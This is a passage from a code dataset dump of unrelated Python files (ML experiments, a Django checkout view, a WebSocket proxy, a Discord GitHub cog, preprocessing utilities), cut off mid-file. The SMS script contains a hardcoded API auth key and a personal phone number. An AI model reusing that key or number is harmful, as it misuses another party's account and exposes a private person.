files_with_tags = pickle.load(open(args.pickle_file, \"rb\"))\n logging.info(\"Loadad {} file(s) with face tags\".format(len(files_with_tags)))\n\n search_name = args.search_name\n files_with_name = find_faces(search_name, files_with_tags)\n logging.info(\"Found {} face(s) for search '{}''\".format(len(files_with_name), search_name))\n\n faces_to_filetags_dict = make_face_to_file_dict(files_with_tags)\n logging.info(\"Found {} different face(s)\".format(len(faces_to_filetags_dict.keys())))\n for key, value in sorted(faces_to_filetags_dict.items(), key=lambda kv: len(kv[1]), reverse=True):\n print(\"{} appears in {} images\".format(key, len(value)))\n\n if shall_plot:\n visualize_faces(files_with_tags, False)\n visualize_face_in_files(files_with_name)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(filename='sample.log',level=logging.INFO)\n logging.getLogger().addHandler(logging.StreamHandler())\n main()\n","sub_path":"browse.py","file_name":"browse.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"568281290","text":"import os\nimport sys\nsys.path.append(str(os.getcwd()))\n\nfrom parametricSN.utils.helpers import experiments_cli, experiments_mpCommands\n\nmlflow_exp_name = os.path.basename(__file__)\nPROCESS_BATCH_SIZE = 1\n\nRUN_FILE = \"parametricSN/main.py\"\nPARAMS_FILE = \"parameters_texture.yml\"\nOPTIM = \"sgd\"\nLR = 0.001\nLRS = 0.1\nLRO = 0.7\nDF = 25\nEPOCHS = 150\nRUNS_PER_SEED = 4\nTOTALRUNS = 1\nSCHEDULER = \"OneCycleLR\"\nAUGMENT = \"original-cifar\"\nACCUM_STEP_MULTIPLE = 128\nTEST_BATCH_SIZE = 128\nTRAIN_BATCH_SIZE = 16\nSECOND_ORDER = 0\nMODEL = 'cnn'\nMODEL_WIDTH = 8\nSCATT_ARCH = 'identity'\nMODEL_LOSS = 'cross-entropy-accum'\n\n\nif __name__ == '__main__':\n PYTHON, DATA_ARG = experiments_cli()\n\n commands = []\n for SEED in [1390666426,432857963,1378328753,1118756524]:\n for sample in ['a', 'b', 'c', 'd']:\n args1 = \"-oname {} -olr {} -gseed {} -me {} -odivf {} -os {} -daug {} -en {} -pf {} -dsam {} {}\".format(\n OPTIM,LR,SEED,EPOCHS,DF,SCHEDULER,AUGMENT,mlflow_exp_name,PARAMS_FILE, sample, DATA_ARG\n )\n args2 = \"-mw {} -mloss {} -sa {} -dtstbs {} -dtbs {} -mname {} -dasm {}\".format(\n MODEL_WIDTH,MODEL_LOSS,SCATT_ARCH,TEST_BATCH_SIZE,TRAIN_BATCH_SIZE,MODEL,ACCUM_STEP_MULTIPLE)\n command = \"{} {} run-train {} {}\".format(\n PYTHON,RUN_FILE,args1,args2)\n commands.append(command)\n\n experiments_mpCommands(\n processBatchSize=PROCESS_BATCH_SIZE,\n commands=commands\n )\n\n ","sub_path":"experiments/kth/kth_sample_experiment_onlycnn.py","file_name":"kth_sample_experiment_onlycnn.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"305434084","text":"import os\ntry:\n import requests\nexcept ImportError:\n os.system('pip install requests')\n\nimport requests\nimport urllib\nimport csv\nimport time\n\nauth_key = '144872AoGnBaVgqLh59f59619'\nurl = 'http://sms.globehost.com/api/sendhttp.php?'\n\n\ndef send_message(contact):\n\n message = \"\"\"\n Warm up everyone! The wait for JCC is over. \n We are all set to begin it this evening at 5:45 PM in LG 11,12 and 13. \n Pull up your socks, pick up your pens, set your mind straight and put down your logic.\n May the best team win. \n Note : On spot Registrations are welcome. 
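The experiment script above builds one command per (seed, sample) pair with nested loops; itertools.product expresses the same grid in a single loop. A sketch with made-up placeholder values:

import itertools

seeds = [1390666426, 432857963]   # subset of the seeds above
samples = ["a", "b", "c", "d"]

commands = []
for seed, sample in itertools.product(seeds, samples):
    # Placeholder command string; the real script interpolates many more flags.
    commands.append("python main.py --seed {} --sample {}".format(seed, sample))

print(len(commands), "commands")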
Please carry a pen with yourselves.\n\n Register at jcc.nitdgplug.org\n \"\"\"\n\n data = {\n 'authkey': auth_key,\n 'mobiles': contact,\n 'message': message,\n 'sender': 'GNULUG',\n 'route': '4',\n }\n\n data_encoded = urllib.urlencode(data)\n r = requests.get(url + data_encoded)\n print('Message Sent Successfully to ', contact, r.status_code)\n return r.status_code\n\n\n\n\"\"\"Array of contacts\"\"\"\ncontacts_array = [8436500886]\n\ncontacts_array.sort()\n\nvisited = 0\n\nnon_redundant_array = []\n\nfor contact in contacts_array:\n if visited != contact:\n non_redundant_array.append(contact)\n visited = contact\n\nprint(len(non_redundant_array))\n\nfor contact in non_redundant_array:\n send_message(contact)\n time.sleep(2)\n\n","sub_path":"send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"103579376","text":"from django.contrib import messages\r\nfrom django.shortcuts import render, redirect, get_object_or_404\r\nfrom django.urls import reverse\r\n\r\nfrom accounts.decorators import allowed_users\r\nfrom .forms import OrderCreateForm\r\nfrom .models import CommandeItem, Commande\r\nfrom cart.cart import Cart\r\nfrom django.contrib.admin.views.decorators import staff_member_required\r\nfrom django.conf import settings\r\nfrom django.http import HttpResponse\r\nfrom django.template.loader import render_to_string\r\n\r\n\"\"\"@allowed_users(allowed_roles=['customer'])\"\"\"\r\n\r\n\r\ndef order_create(request):\r\n cart = Cart(request)\r\n if request.method == 'POST':\r\n form = OrderCreateForm(request.POST)\r\n if form.is_valid():\r\n commande = form.save(commit=False)\r\n if cart.coupon:\r\n commande.coupon = cart.coupon\r\n commande.discount = cart.coupon.discount\r\n commande.save()\r\n for item in cart:\r\n CommandeItem.objects.create(\r\n commande=commande,\r\n produit=item['produit'],\r\n prix=item['prix'],\r\n quantity=item['quantity'])\r\n\r\n cart.clear()\r\n context = {\r\n 'commande': commande,\r\n }\r\n request.session['commande_id'] = commande.id\r\n\r\n return redirect(reverse('payment:process'))\r\n # return render(request, 'order/created.html', context)\r\n\r\n else:\r\n form = OrderCreateForm()\r\n context = {\r\n 'cart': cart,\r\n 'form': form\r\n }\r\n return render(request, 'checkout.html', context)\r\n\r\n\r\n\"\"\"\r\n@staff_member_required\r\ndef admin_order_pdf(request, order_id):\r\n Order = get_object_or_404(order, id=order_id)\r\n html = render_to_string('order/pdf.html', {'order': Order})\r\n response = HttpResponse(content_type='application/pdf')\r\n response['Content-Disposition'] = 'filename=\"order_{}.pdf\"'.format(Order.id)\r\n weasyprint.HTML(string=html).write_pdf(response, stylesheets=[weasyprint.CSS(settings.STATIC_ROOT + 'css/pdf.css')])\r\n return response\r\n\"\"\"\r\n","sub_path":"commandes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"648634496","text":"import time\nimport socket\nimport threading\nimport tornado.websocket\nimport tornado.httpserver\nimport tornado.ioloop\nfrom tools.xi_tornadothread import XiTornadoThread\n\n\nclass XiWebSocketProxyServer:\n\n wsClient = None\n tcpClient = None\n\n host = \"\"\n port = \"\"\n\n def __init__(self):\n\n self.server = None\n self.address = None\n\n XiWebSocketProxyServer.wsClient = None\n XiWebSocketProxyServer.tcpClient = None\n\n\n def 
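send.py above urlencodes by hand with the Python 2 name urllib.urlencode (under Python 3 it lives in urllib.parse) and deduplicates a sorted list with a manual neighbour comparison. A hedged sketch of both fixes; the endpoint, key, and number below are placeholders, and requests encodes the query string itself via params:

import time
import requests

URL = "http://example.invalid/api/sendhttp.php"  # placeholder endpoint

def send_message(contact):
    data = {
        "authkey": "PLACEHOLDER_KEY",  # placeholder, not the real key
        "mobiles": contact,
        "message": "hello",
        "sender": "GNULUG",
        "route": "4",
    }
    # requests builds the query string from the dict; no manual urlencode needed.
    r = requests.get(URL, params=data)
    return r.status_code

# set() replaces the sort-and-compare deduplication loop.
for contact in sorted({8436500886, 8436500886}):
    send_message(contact)
    time.sleep(2)  # keep the polite delay between requests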
start(self,host,port,certfile=None,keyfile=None):\n\n XiTornadoThread.start()\n\n XiWebSocketProxyServer.host = host\n XiWebSocketProxyServer.port = port\n\n sockets = tornado.netutil.bind_sockets( 0, 'localhost', socket.AF_INET )\n self.address = sockets[0].getsockname()\n self.app = tornado.web.Application( [ ( r'/mqtt' , XiWebSocketProxyWebSocket ) ] )\n\n if certfile == None :\n\n self.server = tornado.httpserver.HTTPServer( self.app )\n\n else:\n\n self.server = tornado.httpserver.HTTPServer( self.app , ssl_options = {\n \"certfile\": certfile,\n \"keyfile\": keyfile,\n })\n\n self.server.add_sockets( sockets )\n\n\n def _stop_impl(self):\n\n if XiWebSocketProxyServer.wsClient is not None:\n XiWebSocketProxyServer.wsClient.get_websocket_protocol()._abort()\n\n XiTornadoThread.stop()\n\n self.server.stop( )\n\n def stop(self):\n\n tornado.ioloop.IOLoop.instance().add_callback(callback=lambda: self._stop_impl())\n\n\nclass XiWebSocketProxyWebSocket(tornado.websocket.WebSocketHandler):\n\n\n def check_origin(self, origin):\n\n return True\n\n\n def open(self):\n\n XiWebSocketProxyServer.wsClient = self\n XiWebSocketProxyServer.tcpClient = XiWebSocketProxyTcpClient()\n XiWebSocketProxyServer.tcpClient.start( XiWebSocketProxyServer.host , XiWebSocketProxyServer.port )\n\n # hold server thread until connect until tcp client is ready to send/receive\n while XiWebSocketProxyServer.tcpClient.active == 0:\n pass\n\n\n def on_close(self):\n\n if XiWebSocketProxyServer.tcpClient is not None:\n\n XiWebSocketProxyServer.tcpClient.stop()\n XiWebSocketProxyServer.tcpClient = None\n XiWebSocketProxyServer.wsClient = None\n\n\n def on_message(self, message):\n\n if XiWebSocketProxyServer.tcpClient is not None:\n\n XiWebSocketProxyServer.tcpClient.socket.send( message )\n\n def _message_impl(self,message):\n self.write_message( message, True )\n\n def message(self,message):\n tornado.ioloop.IOLoop.instance().add_callback(callback=lambda: self._message_impl(message))\n\n\nclass XiWebSocketProxyTcpClient:\n\n\n def startrecv(self):\n\n self.active = 1\n while self.active == 1 :\n\n try:\n\n reply = self.socket.recv( 1024 )\n\n except Exception as e:\n\n reply = b\"\"\n\n # check end of file\n if reply != b\"\" :\n\n if XiWebSocketProxyServer.wsClient is not None:\n XiWebSocketProxyServer.wsClient.message(reply)\n\n else :\n\n self.active = 0\n\n self.closed = 1\n\n\n def start( self , host , port ):\n\n # connect socket\n\n try :\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM )\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR , 1 )\n self.socket.connect( ( host , port ) )\n self.closed = 0\n\n thread = threading.Thread( target = self.startrecv , args = [ ] )\n thread.start( )\n\n except Exception:\n self.active = 0\n self.closed = 1\n\n def stop(self):\n\n self.active = 0\n self.socket.close()\n\n","sub_path":"tests/tools/xi_websocketproxy.py","file_name":"xi_websocketproxy.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"152012072","text":"from collections import namedtuple\nfrom . 
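The proxy's open handler above spins in "while ... active == 0: pass" until the TCP side is ready; a threading.Event blocks without burning a core. A minimal sketch of that hand-off (the names are invented, not the proxy's real classes):

import threading
import time

ready = threading.Event()

def connect_backend():
    time.sleep(0.1)  # stand-in for the real socket connect
    ready.set()      # signal the waiting side instead of flipping a flag

threading.Thread(target=connect_backend).start()
ready.wait(timeout=5)  # blocks without busy-waiting
print("backend ready:", ready.is_set())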
import grammar\n\n\n__all__ = ['convert_to_cps']\n\n\nCall = namedtuple('Call', 'left, right, continue_label')\nConversion = namedtuple('Conversion', 'name, instructions')\nCondGoto = namedtuple('CondGoto', 'test, true_label, false_label')\nGoto = namedtuple('Goto', 'label, args')\nLabel = namedtuple('Label', 'name, params')\nTailCall = namedtuple('TailCall', 'left, right')\n\n\ndef convert_to_cps(program):\n writer = Writer()\n writer.write(program)\n return Conversion(writer.name, writer.instructions)\n\n\nclass Counter(object):\n def __init__(self, prefix):\n self.prefix = prefix\n self.count = 0\n\n def next(self):\n self.count += 1\n return '%s%s' % (self.prefix, self.count)\n\n\n_cases = []\ndef case(cls):\n def register(f):\n _cases.append((cls, f))\n return f\n return register\n\n\nclass Writer(object):\n def __init__(self):\n self.name = None\n self.funcs = Counter('^f')\n self.labels = Counter('@L')\n self.params = Counter('$r')\n self.values = Counter('%i')\n self.instructions = []\n self.append = self.instructions.append\n\n def define_value(self, value):\n self.name = self.values.next()\n self.append(grammar.Definition(self.name, value))\n\n def extend(self, *instructions):\n self.instructions.extend(instructions)\n\n def label(self, *params):\n cooked = [grammar.Parameter(i) for i in params]\n return Label(self.labels.next(), cooked)\n\n def write(self, node):\n for (cls, handler) in _cases:\n if isinstance(node, cls):\n handler(self, node)\n return self.name\n raise NotImplementedError\n\n\n@case(basestring)\ndef write_name(writer, name):\n writer.name = name\n\n\n@case(list)\ndef write_list(writer, items):\n for item in items:\n writer.write(item)\n\n\n@case((grammar.Collection, grammar.Record))\ndef write_collection(writer, node):\n elements = [writer.write(i) for i in node.elements]\n writer.define_value(node._replace(elements=elements))\n\n\n@case(grammar.Func)\ndef write_func(writer, func):\n name = writer.funcs.next() if func.name is None else func.name\n if func.body:\n conv = convert_to_cps(func.body)\n body = [Label('@Enter', [])] + conv.instructions\n if conv.name is not None:\n body.append(grammar.ReturnStmt(conv.name))\n else:\n body = [grammar.ReturnStmt(None)]\n writer.name = name\n writer.append(func._replace(name=name, body=body))\n\n\n@case(grammar.If)\ndef write_if(writer, node):\n writer.write(node.test)\n dst1 = writer.label()\n dst2 = writer.label()\n dst3 = writer.label(writer.params.next())\n writer.extend(CondGoto(writer.name, dst1.name, dst2.name), dst1)\n writer.write(node.true_case)\n writer.extend(Goto(dst3.name, [writer.name]), dst2)\n if node.false_case:\n writer.write(node.false_case)\n else:\n writer.name = '%nil'\n writer.extend(Goto(dst3.name, [writer.name]), dst3)\n writer.name = dst3.params[0].name\n\n\n@case(grammar.Operation)\ndef write_operation(writer, stmt):\n if stmt.operator == '':\n left = writer.write(stmt.left)\n right = writer.write(stmt.right)\n param = writer.params.next()\n dst = writer.label(param)\n writer.extend(Call(left, right, dst.name), dst)\n writer.name = param\n\n\n@case(grammar.ReturnStmt)\ndef write_return_stmt(writer, stmt):\n if isinstance(stmt.value, grammar.Operation) and stmt.value.operator == '':\n left = writer.write(stmt.value.left)\n right = writer.write(stmt.value.right)\n writer.append(TailCall(left, right))\n writer.name = None\n return\n\n if stmt.value is None:\n writer.name = None\n else:\n writer.write(stmt.value)\n writer.append(stmt._replace(value=writer.name))\n writer.name = 
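The @case decorator above keeps a (type, handler) list that Writer.write scans; the registry pattern works on its own. A cut-down Python 3 sketch of the dispatch-by-type idea (the original module targets Python 2, as the basestring case shows):

_cases = []

def case(cls):
    # Register a handler for nodes of the given type.
    def register(f):
        _cases.append((cls, f))
        return f
    return register

@case(int)
def handle_int(node):
    return "int:%d" % node

@case(str)
def handle_str(node):
    return "str:%s" % node

def write(node):
    for cls, handler in _cases:
        if isinstance(node, cls):
            return handler(node)
    raise NotImplementedError(type(node))

print(write(3), write("x"))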
None\n\n\n@case(grammar.Tokens.WholeNumber)\ndef write_whole_number(writer, num):\n writer.define_value(num)\n","sub_path":"stride/cps.py","file_name":"cps.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"235279923","text":"from pathlib import Path\n\nimport requests\nfrom git import Repo\nfrom redbot.core import checks\nfrom redbot.core.commands import commands, Context\n\nfrom .github_helper import GitHubHelper\n\n\nclass GitHub(commands.Cog):\n USER = 'bot'\n REPO_NAME = 'TestBot1'\n REPO_PATH = Path(f'/home/{USER}/.local/share/Red-DiscordBot/data/{REPO_NAME}/')\n TEST_REPO_DIR = REPO_PATH.joinpath('Test_Cogs')\n PARENT_REPO = Repo(str(REPO_PATH))\n\n @checks.admin_or_permissions()\n @commands.command()\n async def gitPull(self, ctx: Context):\n await ctx.send(self.PARENT_REPO.git.pull())\n\n @checks.admin_or_permissions()\n @commands.command()\n async def gitReset(self, ctx: Context):\n await ctx.send(self.PARENT_REPO.git.reset('HEAD', '--hard'))\n\n @commands.command()\n async def addToGitHubOrganization(self, ctx: Context, github_username):\n if not github_username:\n await ctx.send_help()\n driver = GitHubHelper.make_driver()\n try:\n GitHubHelper.is_valid_github_user(driver=driver, user=github_username)\n requests.post(url='http://10.147.19.43:41434/api/v1/github_invite', data={\"username\": github_username})\n await ctx.send(f'Check your email associated with the github account: {github_username}')\n except AssertionError:\n await ctx.send(f'Could not find the github account with the username of: {github_username}')\n\n @checks.admin_or_permissions()\n @commands.command()\n async def cloneTestRepo(self, ctx: Context, github_repo_url: str):\n if not github_repo_url:\n await ctx.send_help()\n if 'github.com/ACM-CBU/' in github_repo_url and len(github_repo_url.split('/')) > 4:\n sub_name = github_repo_url.split('/')[-1]\n new_sub = self.PARENT_REPO.create_submodule(name=sub_name, path=str(self.TEST_REPO_DIR.joinpath(sub_name)),\n url=github_repo_url)\n new_sub.set_parent_commit(None)\n await ctx.send(f\"added submodule {new_sub.name}\")\n # self.PARENT_REPO.git.commit(message=f\"Added new Submodule: {sub_name}\")\n # self.PARENT_REPO.git.push()\n\n else:\n await ctx.send(\"The repository must be within the ACM GitHub Organization\")\n\n @checks.admin_or_permissions()\n @commands.command()\n async def updateSubmodule(self, ctx: Context, submodule_name):\n if not submodule_name:\n await ctx.send_help()\n try:\n submodule = self.PARENT_REPO.submodule(name=submodule_name)\n sub_repo = submodule.module()\n await ctx.send(sub_repo.git.pull())\n except:\n await ctx.send(f\"Could not find submodule: {submodule_name}\")\n\n @checks.admin_or_permissions()\n @commands.command()\n async def deleteSubmodule(self, ctx: Context, submodule_name):\n if not submodule_name:\n await ctx.send_help()\n try:\n submodule = self.PARENT_REPO.submodule(name=submodule_name)\n submodule.remove()\n await ctx.send(f'Deleted submodule: {submodule_name}')\n except:\n await ctx.send(f\"Could not find submodule: {submodule_name}\")\n","sub_path":"cogs/CogManager/cogs/github/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"283193917","text":"\"\"\"\n@brief test log(time=140s)\n\nYou should indicate a time in seconds. 
The program ``run_unittests.py``\nwill sort all test files by increasing time and run them.\n\"\"\"\n\n\nimport sys\nimport os\nimport unittest\n\n\ntry:\n import src\n import pyquickhelper as skip_\nexcept ImportError:\n path = os.path.normpath(\n os.path.abspath(\n os.path.join(\n os.path.split(__file__)[0],\n \"..\",\n \"..\")))\n if path not in sys.path:\n sys.path.append(path)\n path = os.path.normpath(\n os.path.abspath(\n os.path.join(\n os.path.split(__file__)[0],\n \"..\",\n \"..\",\n \"..\",\n \"pyquickhelper\",\n \"src\")))\n if path not in sys.path:\n sys.path.append(path)\n import src\n import pyquickhelper as skip_\n\nfrom pyquickhelper.loghelper import fLOG\nfrom src.pyensae.remote.magic_azure import MagicAzure\n\nthisfold = os.path.abspath(os.path.split(__file__)[0])\nthiscomm = os.path.join(thisfold, \"..\")\nsys.path.append(thiscomm)\n\n\nclass MockObject:\n pass\n\n\nclass TestMagicAzure(unittest.TestCase):\n\n def test_blob_path(self):\n fLOG(\n __file__,\n self._testMethodName,\n OutputPrint=__name__ == \"__main__\")\n\n mg = MagicAzure()\n mg.shell = MockObject()\n mg.shell.user_ns = {\"remote_azure_client\": MockObject(),\n \"remote_azure_blob\": MockObject()}\n mg.shell.user_ns[\"remote_azure_client\"].account_name = \"ACC\"\n cmd = \"/part1/part2\"\n fLOG(\"**\", cmd)\n res = mg.blob_path(cmd)\n fLOG(res)\n self.assertEqual(res, ('ACC', 'part1/part2'))\n res = mg.blob_path(\"part1/part2\")\n fLOG(res)\n self.assertEqual(res, ('part1', 'part2'))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"_unittests/ut_remote/test_magic_azure.py","file_name":"test_magic_azure.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"556626849","text":"from fileinput import input\nfrom collections import defaultdict\nfrom string import ascii_uppercase\nfrom copy import deepcopy\n\nlines = [i.rstrip() for i in input()]\ntuples = [(i[5], i[36]) for i in lines]\n\nx = defaultdict(list)\nfor t in tuples:\n x[t[1]].append(t[0])\n [x[s] for s in t[0]]\n#print(x)\n\ndef findFirstEmpty(dct):\n for s in dct.keys():\n if dct[s] == []:\n return s\n return \"\"\n\nbackup = dict(x)\n\norder = []\nwhile len(order) < 26:\n key = findFirstEmpty(x)\n order.append(key)\n for s in x.keys():\n x[s] = [i for i in x[s] if i != key]\n del x[key]\n\n\n\n#print(\"\".join(order))\n#print((x))\n\n##Part2\n\n\n\nprint(backup)\ndone = set()\nworkers = [(\"\", 0)] * 5\n\ndef findFirstEmptyBis(dct):\n for s in dct.keys():\n if dct[s] == [] and s not in getInProgress(workers):\n return s\n return \"\"\n\ndef removeFromDict(letter, dct):\n for x in dct.keys():\n dct[x] = [i for i in dct[x] if i != letter]\n del dct[letter]\n\ndef getInProgress(wrk):\n return {i[0] for i in workers}\n\ndef getSeconds(letter):\n if letter == \"\":\n return 0\n return 61 + (ord(letter) - ord('A'))\n\n\ncounter = -1\nwhile len(done) < 27:\n #print(workers)\n counter += 1\n workers = [(l, t-1) for l,t in workers]\n for i,w in enumerate(workers):\n if w[1] <= 0:\n done.add(w[0])\n if w[0] in backup:\n removeFromDict(w[0], backup)\n nxtletter = findFirstEmptyBis(backup)\n workers[i] = (nxtletter, getSeconds(nxtletter))\n \nprint(counter)","sub_path":"day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"504100352","text":"\"\"\"Tests for the Cast config flow.\"\"\"\n\nfrom homeassistant import 
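day7.py above repeatedly takes the alphabetically first step whose prerequisite list has emptied, which is a topological sort with a lexicographic tie-break. A small self-contained sketch; the four-step graph is invented:

deps = {"A": [], "B": ["A"], "C": ["A"], "D": ["B", "C"]}  # step -> prerequisites

order = []
pending = {step: list(pre) for step, pre in deps.items()}
while pending:
    # Alphabetically first step whose prerequisites are all done.
    step = min(s for s, pre in pending.items() if not pre)
    order.append(step)
    del pending[step]
    for pre in pending.values():
        if step in pre:
            pre.remove(step)

print("".join(order))  # ABCD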
config_entries, data_entry_flow\nfrom homeassistant.components import cast\nfrom homeassistant.setup import async_setup_component\n\nfrom tests.async_mock import patch\n\n\nasync def test_creating_entry_sets_up_media_player(hass):\n \"\"\"Test setting up Cast loads the media player.\"\"\"\n with patch(\n \"homeassistant.components.cast.media_player.async_setup_entry\",\n return_value=True,\n ) as mock_setup, patch(\n \"pychromecast.discovery.discover_chromecasts\", return_value=(True, None)\n ), patch(\n \"pychromecast.discovery.stop_discovery\"\n ):\n result = await hass.config_entries.flow.async_init(\n cast.DOMAIN, context={\"source\": config_entries.SOURCE_USER}\n )\n\n # Confirmation form\n assert result[\"type\"] == data_entry_flow.RESULT_TYPE_FORM\n\n result = await hass.config_entries.flow.async_configure(result[\"flow_id\"], {})\n assert result[\"type\"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY\n\n await hass.async_block_till_done()\n\n assert len(mock_setup.mock_calls) == 1\n\n\nasync def test_configuring_cast_creates_entry(hass):\n \"\"\"Test that specifying config will create an entry.\"\"\"\n with patch(\n \"homeassistant.components.cast.async_setup_entry\", return_value=True\n ) as mock_setup:\n await async_setup_component(\n hass, cast.DOMAIN, {\"cast\": {\"some_config\": \"to_trigger_import\"}}\n )\n await hass.async_block_till_done()\n\n assert len(mock_setup.mock_calls) == 1\n\n\nasync def test_not_configuring_cast_not_creates_entry(hass):\n \"\"\"Test that no config will not create an entry.\"\"\"\n with patch(\n \"homeassistant.components.cast.async_setup_entry\", return_value=True\n ) as mock_setup:\n await async_setup_component(hass, cast.DOMAIN, {})\n await hass.async_block_till_done()\n\n assert len(mock_setup.mock_calls) == 0\n","sub_path":"tests/components/cast/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"581462236","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: erigara\n\nModule provide preprocessing functions\n\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nfrom database.rating_data import RatingData\n\ndef groupsize_filter(rating_data, by, min_groupsize=0):\n \"\"\"\n Remove rows with id_column such that it has < min_groupzize rows in dataframe\n \n rating_data : RatingData\n \n by : str\n name of groupby column\n \n min_groupsize : int\n smallest possible groupsize that stay in dataframe\n \"\"\"\n df_cnt = pd.DataFrame(\n rating_data.df.groupby(by).size(),\n columns=['count'])\n ids = list(pd.unique(df_cnt.query('count >= @min_groupsize').index))\n filtred_df = rating_data.df.query(by+' in @ids')\n return RatingData(filtred_df, *rating_data[1:])\n\ndef get_train_test_split(rating_data, by, train_coeff = 0.8):\n \"\"\"\n Spliting dataframe into two datarames with fixed size. All data sorted by time and each\n train samle contain the same portion of each user's data\n\n df: pd.DataFrame\n dataframe needed to be split\n\n by: str\n name of ids column\n\n train_coeff: int\n coefficient of train sample size\n\n return:\n train, test: pd.DataFrame\n dataframes which split by time. 
test dataframe contains elder user's ratings\n \"\"\"\n cur_df = rating_data.df.copy()\n cur_df.sort_values(by=[by, rating_data.timestamp_col_name], inplace=True)\n sizes = list(rating_data.df.groupby(by).size())\n train_sizes = [round(train_coeff * size) for size in sizes]\n train_indexer = np.array([True for i in range(sum(sizes))])\n # fill with False last (1-train_coeff) rows for every user_id\n current_size = 0\n for i in range(len(train_sizes)):\n train_indexer[current_size + train_sizes[i] : current_size + sizes[i]] = False\n current_size += sizes[i]\n test_indexer = ~train_indexer\n train_df, test_df = cur_df[train_indexer], cur_df[test_indexer]\n \n \n return RatingData(train_df, *rating_data[1:]), RatingData(test_df, *rating_data[1:])\n\n","sub_path":"utils/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"291955662","text":"#!/bin/env python\n# -*- coding: utf-8 -*-\n# encoding=utf-8 vi:ts=4:sw=4:expandtab:ft=python\n#======================================================================\n#\n# Copyright (c) 2017 Baidu.com, Inc. All Rights Reserved\n#\n#======================================================================\n\"\"\"\n/***************************************************************************\n *\n * Copyright (c) 2019 Baidu.com, Inc. All Rights Reserved\n * @file test_dist_fleet_utils_cloud_client.py\n * @author liyang109@baidu.com\n * @date 2021-01-20 19:57\n * @brief \n *\n **************************************************************************/\n\"\"\"\nimport os\nimport sys\nimport subprocess\nfrom utils import run_priority\n\n\nclass TestFleetUtilsAfsApi():\n \"\"\"TestFleetUtilsAfsApi\"\"\"\n def test_dist_fleet_utils_hdfs_client(self):\n \"\"\"test_dist_fleet_worker\"\"\"\n cmd = 'fleetrun dist_fleet_utils_hdfs_client.py'\n pro = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = pro.communicate()\n print(out)\n pro.wait()\n pro.returncode == 0\n\n def test_dist_fleet_utils_local_client(self):\n \"\"\"test_dist_fleet_utils_local_client\"\"\"\n cmd = 'fleetrun dist_fleet_utils_localfs.py'\n pro = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = pro.communicate()\n print(out)\n pro.wait()\n pro.returncode == 0","sub_path":"dist_cts/dist_fleet_2.0/test_dist_fleet_utils_cloud_client.py","file_name":"test_dist_fleet_utils_cloud_client.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"508592039","text":"import numpy as np\nfrom timeit import default_timer as timer\n\nfilenames = ['1', '2', '3', '4']\nLOOPS = 5000\n\n# ====================\n# === INPUT PARSER ===\n# ====================\nfor filename in filenames:\n start = timer()\n services, countries, tabella, progetti = [[], [], [], []]\n with open(\"in/{}.in\".format(filename)) as f:\n # V = providers, S = services, C = countries, P = projects\n V, S, C, P = map(int, f.readline().split())\n services = f.readline().split()\n countries = f.readline().split()\n # Read providers\n for i in range(V):\n name, number = f.readline().split()\n for j in range(int(number)):\n f.readline()\n tabella.append([i] + [j] + list(map(lambda x: float(x), f.readline().split())) + list(map(lambda x: float(x), f.readline().split())))\n # Read projects\n idProg = 0\n for p in range(P):\n line = 
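get_train_test_split above computes per-user cut points by hand from group sizes; pandas' groupby with cumcount builds the same boolean mask directly. A hedged sketch; the column names and toy frame are placeholders, not RatingData's real schema:

import pandas as pd

df = pd.DataFrame({
    "user": [1, 1, 1, 1, 2, 2],
    "ts":   [3, 1, 2, 4, 2, 1],
})

train_coeff = 0.8
df = df.sort_values(["user", "ts"])

# Position of each row inside its user group, and the group's size.
rank = df.groupby("user").cumcount()
size = df.groupby("user")["user"].transform("size")

train_mask = rank < (train_coeff * size).round()
train, test = df[train_mask], df[~train_mask]
print(len(train), len(test))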
